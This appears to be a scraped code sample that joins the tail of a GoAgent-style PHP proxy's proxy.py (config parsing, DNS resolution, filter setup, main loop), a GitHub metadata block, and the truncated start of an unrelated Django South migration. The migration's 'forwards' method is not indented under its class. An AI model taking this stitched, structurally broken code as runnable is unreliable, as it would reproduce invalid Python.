        # no local resolution: the upstream proxy resolves the hostname
        return [hostname]
class Common(object):
    """Global Config Object

    Parses proxy.ini (plus an optional per-user config.ini and GOAGENT_*
    environment overrides) into uppercase attributes read by the rest of
    the program.

    Fix: extend_iplist() previously logged ``len(old - new)`` as the number
    of addresses "added", which is the wrong set difference; it now logs
    ``len(new - old)``.  The resulting IPLIST_MAP contents are unchanged.
    """
    ENV_CONFIG_PREFIX = 'GOAGENT_'
    def __init__(self):
        """load config from proxy.ini"""
        # require ' = ' as the option delimiter so option names (profile
        # sites) may themselves contain ':' without being split there
        ConfigParser.RawConfigParser.OPTCRE = re.compile(r'(?P<option>\S+)\s+(?P<vi>[=])\s+(?P<value>.*)$')
        self.CONFIG = ConfigParser.ConfigParser()
        self.CONFIG_FILENAME = os.path.splitext(os.path.abspath(__file__))[0]+'.ini'
        self.DATA_PATH = os.path.join(root_path, os.pardir, os.pardir, "data", "php_proxy")
        if not os.path.isdir(self.DATA_PATH):
            os.mkdir(self.DATA_PATH)
        # the user config, when present, is read on top of the bundled one
        self.CONFIG_USER_FILENAME = os.path.join(self.DATA_PATH, "config.ini")
        if os.path.isfile(self.CONFIG_USER_FILENAME):
            self.CONFIG.read([self.CONFIG_FILENAME, self.CONFIG_USER_FILENAME])
        else:
            self.CONFIG.read(self.CONFIG_FILENAME)
        # GOAGENT_<SECTION>_<OPTION> environment variables override the files
        for key, value in os.environ.items():
            m = re.match(r'^%s([A-Z]+)_([A-Z\_\-]+)$' % self.ENV_CONFIG_PREFIX, key)
            if m:
                self.CONFIG.set(m.group(1).lower(), m.group(2).lower(), value)
        # [listen] section
        self.LISTEN_IP = self.CONFIG.get('listen', 'ip')
        self.LISTEN_PORT = self.CONFIG.getint('listen', 'port')
        self.LISTEN_USERNAME = self.CONFIG.get('listen', 'username') if self.CONFIG.has_option('listen', 'username') else ''
        self.LISTEN_PASSWORD = self.CONFIG.get('listen', 'password') if self.CONFIG.has_option('listen', 'password') else ''
        self.LISTEN_VISIBLE = self.CONFIG.getint('listen', 'visible')
        self.LISTEN_DEBUGINFO = self.CONFIG.getint('listen', 'debuginfo')
        # [gae] section
        self.GAE_ENABLE = self.CONFIG.getint('gae', 'enable')
        self.GAE_APPIDS = re.findall(r'[\w\-\.]+', self.CONFIG.get('gae', 'appid').replace('.appspot.com', ''))
        self.GAE_PASSWORD = self.CONFIG.get('gae', 'password').strip()
        self.GAE_PATH = self.CONFIG.get('gae', 'path')
        self.GAE_MODE = self.CONFIG.get('gae', 'mode')
        self.GAE_IPV6 = self.CONFIG.getint('gae', 'ipv6')
        self.GAE_WINDOW = self.CONFIG.getint('gae', 'window')
        self.GAE_KEEPALIVE = self.CONFIG.getint('gae', 'keepalive')
        self.GAE_CACHESOCK = self.CONFIG.getint('gae', 'cachesock')
        self.GAE_HEADFIRST = self.CONFIG.getint('gae', 'headfirst')
        self.GAE_OBFUSCATE = self.CONFIG.getint('gae', 'obfuscate')
        self.GAE_VALIDATE = self.CONFIG.getint('gae', 'validate')
        self.GAE_TRANSPORT = self.CONFIG.getint('gae', 'transport') if self.CONFIG.has_option('gae', 'transport') else 0
        self.GAE_OPTIONS = self.CONFIG.get('gae', 'options')
        self.GAE_REGIONS = set(x.upper() for x in self.CONFIG.get('gae', 'regions').split('|') if x.strip())
        self.GAE_SSLVERSION = self.CONFIG.get('gae', 'sslversion')
        self.GAE_PAGESPEED = self.CONFIG.getint('gae', 'pagespeed') if self.CONFIG.has_option('gae', 'pagespeed') else 0
        self.GAE_MAXSIZE = self.CONFIG.getint('gae', 'maxsize')
        # probe for a usable IPv6 route; fall back to IPv4 when none exists
        if self.GAE_IPV6:
            sock = None
            try:
                sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
                sock.connect(('2001:4860:4860::8888', 53))
                logging.info('use ipv6 interface %s for gae', sock.getsockname()[0])
            except Exception as e:
                logging.info('Fail try use ipv6 %r, fallback ipv4', e)
                self.GAE_IPV6 = 0
            finally:
                if sock:
                    sock.close()
        # treat the Windows logon DNS domain (if sane) as a profile suffix
        if 'USERDNSDOMAIN' in os.environ and re.match(r'^\w+\.\w+$', os.environ['USERDNSDOMAIN']):
            self.CONFIG.set('profile', '.' + os.environ['USERDNSDOMAIN'], '')
        # parse the [profile] section into the various routing maps
        urlrewrite_map = collections.OrderedDict()
        host_map = collections.OrderedDict()
        host_postfix_map = collections.OrderedDict()
        hostport_map = collections.OrderedDict()
        hostport_postfix_map = collections.OrderedDict()
        urlre_map = collections.OrderedDict()
        withgae_sites = []
        withphp_sites = []
        withvps_sites = []
        crlf_sites = []
        nocrlf_sites = []
        forcehttps_sites = []
        noforcehttps_sites = []
        fakehttps_sites = []
        nofakehttps_sites = []
        dns_servers = []
        for site, rule in self.CONFIG.items('profile'):
            rules = [x.strip() for x in re.split(r'[,\|]', rule) if x.strip()]
            if site == 'dns':
                dns_servers = rules
                continue
            # URL-shaped rules (or $1 backreferences) are rewrite targets
            if rule.startswith(('file://', 'http://', 'https://')) or '$1' in rule:
                urlrewrite_map[site] = rule
                continue
            # keyword flags route the site into the matching behaviour list
            for name, sites in [('withgae', withgae_sites),
                                ('withphp', withphp_sites),
                                ('withvps', withvps_sites),
                                ('crlf', crlf_sites),
                                ('nocrlf', nocrlf_sites),
                                ('forcehttps', forcehttps_sites),
                                ('noforcehttps', noforcehttps_sites),
                                ('fakehttps', fakehttps_sites),
                                ('nofakehttps', nofakehttps_sites)]:
                if name in rules:
                    sites.append(site)
                    rules.remove(name)
            # whatever remains is the alias/hostname the site maps to
            hostname = rules and rules[0]
            if not hostname:
                continue
            # classify the site key: host:port, regex (contains '\'), or host
            if ':' in site and '\\' not in site:
                if site.startswith('.'):
                    hostport_postfix_map[site] = hostname
                else:
                    hostport_map[site] = hostname
            elif '\\' in site:
                urlre_map[re.compile(site).match] = hostname
            else:
                if site.startswith('.'):
                    host_postfix_map[site] = hostname
                else:
                    host_map[site] = hostname
        self.HTTP_DNS = dns_servers
        self.WITHGAE_SITES = tuple(withgae_sites)
        self.WITHPHP_SITES = tuple(withphp_sites)
        self.WITHVPS_SITES = tuple(withvps_sites)
        self.CRLF_SITES = tuple(crlf_sites)
        self.NOCRLF_SITES = set(nocrlf_sites)
        self.FORCEHTTPS_SITES = tuple(forcehttps_sites)
        self.NOFORCEHTTPS_SITES = set(noforcehttps_sites)
        self.FAKEHTTPS_SITES = tuple(fakehttps_sites)
        self.NOFAKEHTTPS_SITES = set(nofakehttps_sites)
        self.URLREWRITE_MAP = urlrewrite_map
        self.HOSTPORT_MAP = hostport_map
        self.HOSTPORT_POSTFIX_MAP = hostport_postfix_map
        self.URLRE_MAP = urlre_map
        self.HOST_MAP = host_map
        self.HOST_POSTFIX_MAP = host_postfix_map
        # [iplist] section: name -> list of addresses/hostnames
        self.IPLIST_MAP = collections.OrderedDict((k, v.split('|') if v else []) for k, v in self.CONFIG.items('iplist'))
        self.IPLIST_MAP.update((k, [k]) for k, v in self.HOST_MAP.items() if k == v)
        self.IPLIST_PREDEFINED = [x for x in sum(self.IPLIST_MAP.values(), []) if re.match(r'^\d+\.\d+\.\d+\.\d+$', x) or ':' in x]
        # with IPv6 available, point all other google_* lists at google_ipv6
        if self.GAE_IPV6 and 'google_ipv6' in self.IPLIST_MAP:
            for name in self.IPLIST_MAP.keys():
                if name.startswith('google') and name not in ('google_ipv6', 'google_talk'):
                    self.IPLIST_MAP[name] = self.IPLIST_MAP['google_ipv6']
        # [pac] section
        self.PAC_ENABLE = self.CONFIG.getint('pac', 'enable')
        self.PAC_IP = self.CONFIG.get('pac', 'ip')
        self.PAC_PORT = self.CONFIG.getint('pac', 'port')
        self.PAC_FILE = self.CONFIG.get('pac', 'file').lstrip('/')
        self.PAC_GFWLIST = self.CONFIG.get('pac', 'gfwlist')
        self.PAC_ADBLOCK = self.CONFIG.get('pac', 'adblock')
        self.PAC_ADMODE = self.CONFIG.getint('pac', 'admode')
        self.PAC_EXPIRED = self.CONFIG.getint('pac', 'expired')
        # [php] section
        self.PHP_ENABLE = self.CONFIG.getint('php', 'enable')
        self.PHP_LISTEN = self.CONFIG.get('php', 'listen')
        self.PHP_PASSWORD = self.CONFIG.get('php', 'password') if self.CONFIG.has_option('php', 'password') else ''
        self.PHP_CRLF = self.CONFIG.getint('php', 'crlf') if self.CONFIG.has_option('php', 'crlf') else 1
        self.PHP_VALIDATE = self.CONFIG.getint('php', 'validate') if self.CONFIG.has_option('php', 'validate') else 0
        self.PHP_FETCHSERVERS = self.CONFIG.get('php', 'fetchserver').split('|')
        # [proxy] section (upstream proxy)
        self.PROXY_ENABLE = self.CONFIG.getint('proxy', 'enable')
        self.PROXY_AUTODETECT = self.CONFIG.getint('proxy', 'autodetect') if self.CONFIG.has_option('proxy', 'autodetect') else 0
        self.PROXY_HOST = self.CONFIG.get('proxy', 'host')
        self.PROXY_PORT = self.CONFIG.get('proxy', 'port')
        if self.PROXY_PORT == "":
            self.PROXY_PORT = 0
        else:
            self.PROXY_PORT = int(self.PROXY_PORT)
        self.PROXY_USERNAME = self.CONFIG.get('proxy', 'username')
        # NOTE(review): 'PASSWROD' is a long-standing typo kept for
        # compatibility -- other classes read common.PROXY_PASSWROD
        self.PROXY_PASSWROD = self.CONFIG.get('proxy', 'password')
        # fall back to the system proxy when autodetect is enabled
        if not self.PROXY_ENABLE and self.PROXY_AUTODETECT:
            system_proxy = ProxyUtil.get_system_proxy()
            if system_proxy and self.LISTEN_IP not in system_proxy:
                _, username, password, address = ProxyUtil.parse_proxy(system_proxy)
                proxyhost, _, proxyport = address.rpartition(':')
                self.PROXY_ENABLE = 1
                self.PROXY_USERNAME = username
                self.PROXY_PASSWROD = password
                self.PROXY_HOST = proxyhost
                self.PROXY_PORT = int(proxyport)
        if self.PROXY_ENABLE:
            # behind another proxy, only https fetch mode works
            self.GAE_MODE = 'https'
        # [control] section
        self.CONTROL_ENABLE = self.CONFIG.getint('control', 'enable')
        self.CONTROL_IP = self.CONFIG.get('control', 'ip')
        self.CONTROL_PORT = self.CONFIG.getint('control', 'port')
        # [autorange] section
        self.AUTORANGE_HOSTS = self.CONFIG.get('autorange', 'hosts').split('|')
        self.AUTORANGE_ENDSWITH = tuple(self.CONFIG.get('autorange', 'endswith').split('|'))
        self.AUTORANGE_NOENDSWITH = tuple(self.CONFIG.get('autorange', 'noendswith').split('|'))
        self.AUTORANGE_MAXSIZE = self.CONFIG.getint('autorange', 'maxsize')
        self.AUTORANGE_WAITSIZE = self.CONFIG.getint('autorange', 'waitsize')
        self.AUTORANGE_BUFSIZE = self.CONFIG.getint('autorange', 'bufsize')
        self.AUTORANGE_THREADS = self.CONFIG.getint('autorange', 'threads')
        # [fetchmax] section
        self.FETCHMAX_LOCAL = self.CONFIG.getint('fetchmax', 'local') if self.CONFIG.get('fetchmax', 'local') else 3
        self.FETCHMAX_SERVER = self.CONFIG.get('fetchmax', 'server')
        # [dns] section; profile 'dns' entry takes precedence for servers
        self.DNS_ENABLE = self.CONFIG.getint('dns', 'enable')
        self.DNS_LISTEN = self.CONFIG.get('dns', 'listen')
        self.DNS_SERVERS = self.HTTP_DNS or self.CONFIG.get('dns', 'servers').split('|')
        self.DNS_BLACKLIST = set(self.CONFIG.get('dns', 'blacklist').split('|'))
        self.DNS_TCPOVER = tuple(self.CONFIG.get('dns', 'tcpover').split('|')) if self.CONFIG.get('dns', 'tcpover').strip() else tuple()
        # keep only the address family we are actually going to use
        if self.GAE_IPV6:
            self.DNS_SERVERS = [x for x in self.DNS_SERVERS if ':' in x]
        else:
            self.DNS_SERVERS = [x for x in self.DNS_SERVERS if ':' not in x]
        # [useragent] / [love] sections
        self.USERAGENT_ENABLE = self.CONFIG.getint('useragent', 'enable')
        self.USERAGENT_STRING = self.CONFIG.get('useragent', 'string')
        self.LOVE_ENABLE = self.CONFIG.getint('love', 'enable')
        self.LOVE_TIP = self.CONFIG.get('love', 'tip').encode('utf8').decode('unicode-escape').split('|')
        # main() loops on this flag; clearing it shuts the program down
        self.keep_run = True
    def extend_iplist(self, iplist_name, hosts):
        """Resolve *hosts* against every remote DNS server and merge the
        answers into self.IPLIST_MAP[iplist_name]."""
        logging.info('extend_iplist start for hosts=%s', hosts)
        new_iplist = []
        def do_remote_resolve(host, dnsserver, queue):
            # worker: try UDP then TCP resolution against one server
            assert isinstance(dnsserver, basestring)
            for dnslib_resolve in (dnslib_resolve_over_udp, dnslib_resolve_over_tcp):
                try:
                    time.sleep(random.random())
                    iplist = dnslib_record2iplist(dnslib_resolve(host, [dnsserver], timeout=4, blacklist=self.DNS_BLACKLIST))
                    queue.put((host, dnsserver, iplist))
                except (socket.error, OSError) as e:
                    logging.info('%s remote host=%r failed: %s', str(dnslib_resolve).split()[1], host, e)
                    time.sleep(1)
        result_queue = Queue.Queue()
        # prefer a gevent pool when gevent is loaded; raw threads otherwise
        pool = __import__('gevent.pool', fromlist=['.']).Pool(8) if sys.modules.get('gevent') else None
        for host in hosts:
            for dnsserver in self.DNS_SERVERS:
                logging.debug('remote resolve host=%r from dnsserver=%r', host, dnsserver)
                if pool:
                    pool.spawn(do_remote_resolve, host, dnsserver, result_queue)
                else:
                    thread.start_new_thread(do_remote_resolve, (host, dnsserver, result_queue))
        # each worker can answer up to twice (UDP and TCP)
        for _ in xrange(len(self.DNS_SERVERS) * len(hosts) * 2):
            try:
                host, dnsserver, iplist = result_queue.get(timeout=16)
                logging.debug('%r remote host=%r return %s', dnsserver, host, iplist)
                if '.google' in host:
                    # google hosts: keep only addresses of the right family/range
                    if self.GAE_IPV6:
                        iplist = [x for x in iplist if ':' in x]
                    else:
                        iplist = [x for x in iplist if is_google_ip(x)]
                new_iplist += iplist
            except Queue.Empty:
                break
        # fix: report new-minus-old (the genuinely added addresses); the
        # previous code computed old-minus-new, which is always misleading
        before = set(self.IPLIST_MAP[iplist_name])
        merged = before | set(new_iplist)
        logging.info('extend_iplist finished, added %s', len(merged - before))
        self.IPLIST_MAP[iplist_name] = list(merged)
    def resolve_iplist(self):
        """Resolve every symbolic entry in IPLIST_MAP to concrete addresses.

        Literal IPs are kept as-is; hostnames are resolved locally first,
        with delayed remote re-resolution scheduled for google_hk.
        """
        # https://support.google.com/websearch/answer/186669?hl=zh-Hans
        def do_local_resolve(host, queue):
            # worker: up to three getaddrinfo attempts for one hostname
            assert isinstance(host, basestring)
            for _ in xrange(3):
                try:
                    family = socket.AF_INET6 if self.GAE_IPV6 else socket.AF_INET
                    iplist = [x[-1][0] for x in socket.getaddrinfo(host, 80, family)]
                    queue.put((host, iplist))
                except (socket.error, OSError) as e:
                    logging.warning('socket.getaddrinfo host=%r failed: %s', host, e)
                    time.sleep(0.1)
        google_blacklist = ['216.239.32.20'] + list(self.DNS_BLACKLIST)
        google_blacklist_prefix = tuple(x for x in self.DNS_BLACKLIST if x.endswith('.'))
        for name, need_resolve_hosts in list(self.IPLIST_MAP.items()):
            # skip lists that are already pure IP literals
            if all(re.match(r'\d+\.\d+\.\d+\.\d+', x) or ':' in x for x in need_resolve_hosts):
                continue
            need_resolve_remote = [x for x in need_resolve_hosts if ':' not in x and not re.match(r'\d+\.\d+\.\d+\.\d+', x)]
            resolved_iplist = [x for x in need_resolve_hosts if x not in need_resolve_remote]
            result_queue = Queue.Queue()
            for host in need_resolve_remote:
                logging.debug('local resolve host=%r', host)
                thread.start_new_thread(do_local_resolve, (host, result_queue))
            for _ in xrange(len(need_resolve_remote)):
                try:
                    host, iplist = result_queue.get(timeout=8)
                    resolved_iplist += iplist
                except Queue.Empty:
                    break
            # keep growing google_hk in the background via remote DNS
            if name == 'google_hk' and need_resolve_remote:
                for delay in (30, 60, 150, 240, 300, 450, 600, 900):
                    spawn_later(delay, self.extend_iplist, name, need_resolve_remote)
            if name.startswith('google_') and name not in ('google_cn', 'google_hk') and resolved_iplist:
                # regional lists: keep only addresses sharing the first octet
                iplist_prefix = re.split(r'[\.:]', resolved_iplist[0])[0]
                resolved_iplist = list(set(x for x in resolved_iplist if x.startswith(iplist_prefix)))
            else:
                resolved_iplist = list(set(resolved_iplist))
            if name.startswith('google_'):
                # drop known-poisoned/blacklisted addresses
                resolved_iplist = list(set(resolved_iplist) - set(google_blacklist))
                resolved_iplist = [x for x in resolved_iplist if not x.startswith(google_blacklist_prefix)]
            if len(resolved_iplist) == 0 and name in ('google_hk', 'google_cn') and not self.GAE_IPV6:
                logging.error('resolve %s host return empty! please retry!', name)
                sys.exit(-1)
            logging.info('resolve name=%s host to iplist=%r', name, resolved_iplist)
            common.IPLIST_MAP[name] = resolved_iplist
        # sanity-check google_cn connectivity; fall back to google_hk
        if self.IPLIST_MAP.get('google_cn', []):
            try:
                for _ in xrange(4):
                    socket.create_connection((random.choice(self.IPLIST_MAP['google_cn']), 80), timeout=2).close()
            except socket.error:
                self.IPLIST_MAP['google_cn'] = []
        if len(self.IPLIST_MAP.get('google_cn', [])) < 4 and self.IPLIST_MAP.get('google_hk', []):
            logging.warning('google_cn resolved too short iplist=%s, switch to google_hk', self.IPLIST_MAP.get('google_cn', []))
            self.IPLIST_MAP['google_cn'] = self.IPLIST_MAP['google_hk']
    def info(self):
        """Return a human-readable summary of the active configuration.

        NOTE(review): parts of this method read the module-level singleton
        ``common`` rather than ``self``; equivalent as long as only one
        Common instance exists.
        """
        info = ''
        info += '------------------------------------------------------\n'
        info += 'PHP Proxy Version : %s (python/%s gevent/%s pyopenssl/%s)\n' % (__version__, platform.python_version(), gevent.__version__, OpenSSL.__version__)
        info += 'Uvent Version : %s (pyuv/%s libuv/%s)\n' % (__import__('uvent').__version__, __import__('pyuv').__version__, __import__('pyuv').LIBUV_VERSION) if all(x in sys.modules for x in ('pyuv', 'uvent')) else ''
        info += 'Local Proxy : %s:%s\n' % (self.PROXY_HOST, self.PROXY_PORT) if self.PROXY_ENABLE else ''
        info += 'Debug INFO : %s\n' % self.LISTEN_DEBUGINFO if self.LISTEN_DEBUGINFO else ''
        if common.GAE_ENABLE:
            info += 'Listen Address : %s:%d\n' % (self.LISTEN_IP, self.LISTEN_PORT)
            info += 'GAE Mode : %s\n' % self.GAE_MODE
            info += 'GAE IPv6 : %s\n' % self.GAE_IPV6 if self.GAE_IPV6 else ''
            info += 'GAE APPID : %s\n' % '|'.join(self.GAE_APPIDS)
            info += 'GAE Validate : %s\n' % self.GAE_VALIDATE if self.GAE_VALIDATE else ''
            info += 'GAE Obfuscate : %s\n' % self.GAE_OBFUSCATE if self.GAE_OBFUSCATE else ''
        if common.PAC_ENABLE:
            info += 'Pac Server : http://%s:%d/%s\n' % (self.PAC_IP if self.PAC_IP and self.PAC_IP != '0.0.0.0' else ProxyUtil.get_listen_ip(), self.PAC_PORT, self.PAC_FILE)
            info += 'Pac File : file://%s\n' % os.path.abspath(self.PAC_FILE)
        if common.PHP_ENABLE:
            info += 'PHP Listen : %s\n' % common.PHP_LISTEN
            info += 'PHP FetchServers : %s\n' % common.PHP_FETCHSERVERS
        if common.DNS_ENABLE:
            info += 'DNS Listen : %s\n' % common.DNS_LISTEN
            info += 'DNS Servers : %s\n' % '|'.join(common.DNS_SERVERS)
        info += '------------------------------------------------------\n'
        return info
# module-level singleton: all parsed configuration lives on this object
common = Common()
def pre_start():
    """Push parsed configuration onto the handler classes before serving.

    Mutates class attributes of GAEProxyHandler and RangeFetch, and builds
    the filter chain.  Filters are inserted at index 0 one after another,
    so the *last* insertion here runs *first* at request time.
    """
    if gevent.__version__ < '1.0':
        # NOTE(review): lexicographic string compare -- adequate for
        # '0.x' vs '1.0' but not a general version comparison
        logging.warning("*NOTE*, please upgrade to gevent 1.1 as possible")
    if GAEProxyHandler.max_window != common.GAE_WINDOW:
        GAEProxyHandler.max_window = common.GAE_WINDOW
    if common.GAE_CACHESOCK:
        GAEProxyHandler.tcp_connection_cachesock = True
        GAEProxyHandler.ssl_connection_cachesock = True
    if common.GAE_KEEPALIVE:
        # keepalive implies socket caching for both plain and TLS connections
        GAEProxyHandler.tcp_connection_cachesock = True
        GAEProxyHandler.tcp_connection_keepalive = True
        GAEProxyHandler.ssl_connection_cachesock = True
        GAEProxyHandler.ssl_connection_keepalive = True
    if common.IPLIST_PREDEFINED:
        GAEProxyHandler.iplist_predefined = set(common.IPLIST_PREDEFINED)
    if common.GAE_PAGESPEED and not common.GAE_OBFUSCATE:
        logging.critical("*NOTE*, [gae]pagespeed=1 requires [gae]obfuscate=1")
        sys.exit(-1)
    if common.GAE_SSLVERSION and not sysconfig.get_platform().startswith('macosx-'):
        GAEProxyHandler.ssl_version = getattr(ssl, 'PROTOCOL_%s' % common.GAE_SSLVERSION)
        GAEProxyHandler.openssl_context = SSLConnection.context_builder(common.GAE_SSLVERSION)
    if common.GAE_ENABLE and common.GAE_APPIDS[0] == 'goagent':
        logging.warning('please edit %s to add your appid to [gae] !', common.CONFIG_FILENAME)
    if common.GAE_ENABLE and common.GAE_MODE == 'http' and common.GAE_PASSWORD == '':
        logging.critical('to enable http mode, you should set %r [gae]password = <your_pass> and [gae]options = rc4', common.CONFIG_FILENAME)
        sys.exit(-1)
    if common.GAE_TRANSPORT:
        GAEProxyHandler.disable_transport_ssl = False
    if common.PAC_ENABLE:
        # warm up the PAC server once, ten minutes after start
        pac_ip = ProxyUtil.get_listen_ip() if common.PAC_IP in ('', '::', '0.0.0.0') else common.PAC_IP
        url = 'http://%s:%d/%s' % (pac_ip, common.PAC_PORT, common.PAC_FILE)
        spawn_later(600, urllib2.build_opener(urllib2.ProxyHandler({})).open, url)
    if not common.DNS_ENABLE:
        if not common.HTTP_DNS:
            common.HTTP_DNS = common.DNS_SERVERS[:]
        # prepend system DNS servers; any() merely drives the generator
        # (list.insert returns None, so any(...) is always False)
        for dnsservers_ref in (common.HTTP_DNS, common.DNS_SERVERS):
            any(dnsservers_ref.insert(0, x) for x in [y for y in get_dnsserver_list() if y not in dnsservers_ref])
        GAEProxyHandler.dns_servers = common.HTTP_DNS
        GAEProxyHandler.dns_blacklist = common.DNS_BLACKLIST
    else:
        GAEProxyHandler.dns_servers = common.HTTP_DNS or common.DNS_SERVERS
        GAEProxyHandler.dns_blacklist = common.DNS_BLACKLIST
    RangeFetch.threads = common.AUTORANGE_THREADS
    RangeFetch.maxsize = common.AUTORANGE_MAXSIZE
    RangeFetch.bufsize = common.AUTORANGE_BUFSIZE
    RangeFetch.waitsize = common.AUTORANGE_WAITSIZE
    # always installed (was wrapped in a vacuous 'if True:')
    GAEProxyHandler.handler_filters.insert(0, AutoRangeFilter(common.AUTORANGE_HOSTS, common.AUTORANGE_ENDSWITH, common.AUTORANGE_NOENDSWITH, common.AUTORANGE_MAXSIZE))
    if common.GAE_REGIONS:
        GAEProxyHandler.handler_filters.insert(0, DirectRegionFilter(common.GAE_REGIONS))
    if common.HOST_MAP or common.HOST_POSTFIX_MAP or common.HOSTPORT_MAP or common.HOSTPORT_POSTFIX_MAP or common.URLRE_MAP:
        GAEProxyHandler.handler_filters.insert(0, HostsFilter(common.IPLIST_MAP, common.HOST_MAP, common.HOST_POSTFIX_MAP, common.HOSTPORT_MAP, common.HOSTPORT_POSTFIX_MAP, common.URLRE_MAP))
    if common.CRLF_SITES:
        GAEProxyHandler.handler_filters.insert(0, CRLFSitesFilter(common.CRLF_SITES, common.NOCRLF_SITES))
    if common.URLREWRITE_MAP:
        GAEProxyHandler.handler_filters.insert(0, URLRewriteFilter(common.URLREWRITE_MAP, common.FORCEHTTPS_SITES, common.NOFORCEHTTPS_SITES))
    if common.FAKEHTTPS_SITES:
        GAEProxyHandler.handler_filters.insert(0, FakeHttpsFilter(common.FAKEHTTPS_SITES, common.NOFAKEHTTPS_SITES))
    if common.FORCEHTTPS_SITES:
        GAEProxyHandler.handler_filters.insert(0, ForceHttpsFilter(common.FORCEHTTPS_SITES, common.NOFORCEHTTPS_SITES))
    if common.WITHGAE_SITES or common.WITHPHP_SITES or common.WITHVPS_SITES:
        GAEProxyHandler.handler_filters.insert(0, WithGAEFilter(common.WITHGAE_SITES, common.WITHPHP_SITES, common.WITHVPS_SITES))
    if common.USERAGENT_ENABLE:
        GAEProxyHandler.handler_filters.insert(0, UserAgentFilter(common.USERAGENT_STRING))
    if common.LISTEN_USERNAME:
        # authentication must run before every other filter
        GAEProxyHandler.handler_filters.insert(0, AuthFilter(common.LISTEN_USERNAME, common.LISTEN_PASSWORD))
def main():
    """Program entry point: normalize paths, apply config, start servers."""
    global __file__
    # resolve symlinks and chdir next to the script so relative paths in
    # the configuration behave predictably
    __file__ = os.path.abspath(__file__)
    if os.path.islink(__file__):
        __file__ = getattr(os, 'readlink', lambda x: x)(__file__)
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    pre_start()
    logging.info(common.info())
    if common.CONTROL_ENABLE:
        # web control interface runs on a daemon thread
        control_server = LocalProxyServer((common.CONTROL_IP, common.CONTROL_PORT), web_control.RemoteContralServerHandler)
        p = threading.Thread(target=control_server.serve_forever)
        p.setDaemon(True)
        p.start()
    if common.PHP_ENABLE:
        host, port = common.PHP_LISTEN.split(':')
        # tunnel through the upstream proxy when one is configured
        HandlerClass = PHPProxyHandler if not common.PROXY_ENABLE else ProxyPHPProxyHandler
        HandlerClass.handler_plugins['php'] = PHPFetchPlugin(common.PHP_FETCHSERVERS, common.PHP_PASSWORD, common.PHP_VALIDATE)
        php_server = LocalProxyServer((host, int(port)), HandlerClass)
        thread.start_new_thread(php_server.serve_forever, tuple())
    CertUtil.init_ca()
    # keep the main greenlet alive until common.keep_run is cleared
    while common.keep_run:
        gevent.sleep(1)
    sys.exit(0)
if __name__ == '__main__':
    # run the proxy; Ctrl-C exits quietly instead of dumping a traceback
    try:
        main()
    except KeyboardInterrupt:
        sys.exit()
|
{
"content_hash": "fd53b3a98914618fd975fc0b6ff1366d",
"timestamp": "",
"source": "github",
"line_count": 1172,
"max_line_length": 285,
"avg_line_length": 48.95477815699659,
"alnum_prop": 0.5886013071895425,
"repo_name": "viger/docker",
"id": "e17b2a894932359003d02ac6b1d7cabf2d84efee",
"size": "59840",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "proxy/proxy/code/default/php_proxy/local/proxy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "88"
},
{
"name": "C",
"bytes": "1497159"
},
{
"name": "C++",
"bytes": "252"
},
{
"name": "CSS",
"bytes": "86313"
},
{
"name": "HTML",
"bytes": "140262"
},
{
"name": "JavaScript",
"bytes": "345775"
},
{
"name": "Nginx",
"bytes": "3472"
},
{
"name": "PHP",
"bytes": "10671"
},
{
"name": "Python",
"bytes": "16457633"
},
{
"name": "Shell",
"bytes": "33864"
},
{
"name": "Visual Basic",
"bytes": "1700"
}
],
"symlink_target": ""
}
|
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
    """Forward migration: create the Entrevista (interviewee) table, one
    table per questionnaire answer model (Pregunta_*), and the
    intermediary tables backing their ManyToMany fields.

    The original auto-generated body repeated the same create_table /
    create_unique pattern for every M2M field; the nested helpers below
    factor that repetition out while issuing exactly the same South
    operations in exactly the same order.
    """

    def pk():
        # Fresh AutoField primary-key column; built per call so no field
        # instance is ever shared between create_table invocations.
        return (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True))

    def fk(model):
        # ForeignKey column pointing at the frozen-ORM model `model`.
        return self.gf('django.db.models.fields.related.ForeignKey')(to=orm[model])

    def char(n):
        return self.gf('django.db.models.fields.CharField')(max_length=n)

    def intf():
        return self.gf('django.db.models.fields.IntegerField')()

    def slug():
        return self.gf('django.db.models.fields.SlugField')(max_length=50)

    def m2m(base, left, left_model, right, right_model):
        # Intermediary table for a ManyToMany field: auto PK, two FK
        # columns, and a composite unique constraint over both *_id cols.
        name = db.shorten_name(base)
        db.create_table(name, (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            (left, models.ForeignKey(orm[left_model], null=False)),
            (right, models.ForeignKey(orm[right_model], null=False)),
        ))
        db.create_unique(name, [left + '_id', right + '_id'])

    # Entrevista -- the interviewee record every answer table points to.
    db.create_table(u'analisis_entrevista', (
        pk(),
        ('nombre', char(200)),
        ('posicion', char(200)),
        ('email', self.gf('django.db.models.fields.EmailField')(max_length=75)),
        ('organizacion', fk('mapeo.Organizaciones')),
        ('pais', fk('lugar.Pais')),
        ('telefono', intf()),
        ('fecha', self.gf('django.db.models.fields.DateField')()),
        ('slug', slug()),
        ('alcance1', intf()),
        ('tipo_estudio', fk('configuracion.Tipo_Estudio')),
        ('usuario', fk('auth.User')),
    ))
    db.send_create_signal(u'analisis', ['Entrevista'])
    m2m(u'analisis_entrevista_departamento',
        'entrevista', u'analisis.entrevista',
        'departamento', u'lugar.departamento')

    # Pregunta_1 plus its ubicacion / socio / tema M2M tables.
    db.create_table(u'analisis_pregunta_1', (
        pk(),
        ('proyecto', char(250)),
        ('estado1', intf()),
        ('slug', slug()),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_1'])
    m2m(u'analisis_pregunta_1_ubicacion',
        'pregunta_1', u'analisis.pregunta_1', 'municipio', u'lugar.municipio')
    m2m(u'analisis_pregunta_1_socio',
        'pregunta_1', u'analisis.pregunta_1', 'organizaciones', u'mapeo.organizaciones')
    m2m(u'analisis_pregunta_1_tema',
        'pregunta_1', u'analisis.pregunta_1', 'tema', u'configuracion.tema')

    # Pregunta_2
    db.create_table(u'analisis_pregunta_2', (
        pk(),
        ('seleccion1', intf()),
        ('hombre', intf()),
        ('mujer', intf()),
        ('entrevistado', fk('analisis.Entrevista')),
    ))
    db.send_create_signal(u'analisis', ['Pregunta_2'])

    # Pregunta_3 plus its grupo M2M table.
